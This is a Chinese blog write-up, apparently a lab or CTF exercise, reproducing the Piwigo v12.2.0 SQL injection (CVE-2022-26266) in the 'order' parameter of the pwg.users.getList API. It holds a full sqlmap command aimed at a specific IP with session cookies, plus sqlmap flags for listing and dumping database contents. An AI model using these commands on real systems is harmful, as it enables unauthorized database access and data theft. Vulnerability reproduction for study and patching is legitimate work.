Piwigo SQL注入 (CVE-2022-26266)

一、漏洞概述

Piwigo 是网络端的开源相册程序。 专为组织、团队与个人设计。
Piwigo v12.2.0 被发现包含通过 pwg.users.php 的 SQL 注入漏洞。
数据库名/用户名/密码:piwigo/root/root
SQL注入字段存在:order

二、影响范围

Piwigo v12.2.0

三、访问页面

根据提示安装程序,访问登录。

四、漏洞复现

1、使用sqlmap,带上cookie。

sqlmap.py -u "http://123.58.224.8:37816/ws.php?format=json&method=pwg.users.getList" --data="display=all&order=id&page=0&per_page=5&exclude%5B%5D=2" --cookie="metabase.DEVICE=47be73da-b525-49e6-beec-0c5b291b2e3c; _ga=GA1.1.2097748309.1721011407; SESS9890766374cce7ed90756faa2aa6065d=IbwPbdjotdEpjtogcme_xcduDhzaKwKwMM6M4oZKDis; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_516d7fbaaec4b2edc7517409f91d089e=aaa%7C1722472664%7CIRe36BPx2YZn9GlytmWyghV2zLcUi5fkm2Dukag44Jr%7C5871434765de65b3418eea5eee5db034ee09f40abb2452095644b1f87a059558; wp-settings-time-1=1721263481; PHPSESSID=4ngaqlnchdrjaoueld1d08g0c2; youdianMenuTopID=2; pwg_id=9qk7g48vtql24cqgglp3q0oetv; pwg_user_manager_view=line" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" --referer="http://123.58.224.8:37816/admin.php?page=user_list" --delay=0 --timeout=30 --retries=0 --level=3 --risk=1 --threads=1 --time-sec=5 --technique=BEUSTQ -b --batch --answers="crack=N,dict=N,continue=Y,quit=N"

2、发现注入点

3、确定有sql注入,接下来就是熟悉的操作

sqlmap常用命令:
1、--dbs 获取数据库
2、--tables 获取数据库中所有的表 
3、--columns 参数用来获取字段
4、--dump 获取值

-D '数据库名' -T '表名' -C '字段名1,字段名2' --dump

4、flag在哪(这并不重要)

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值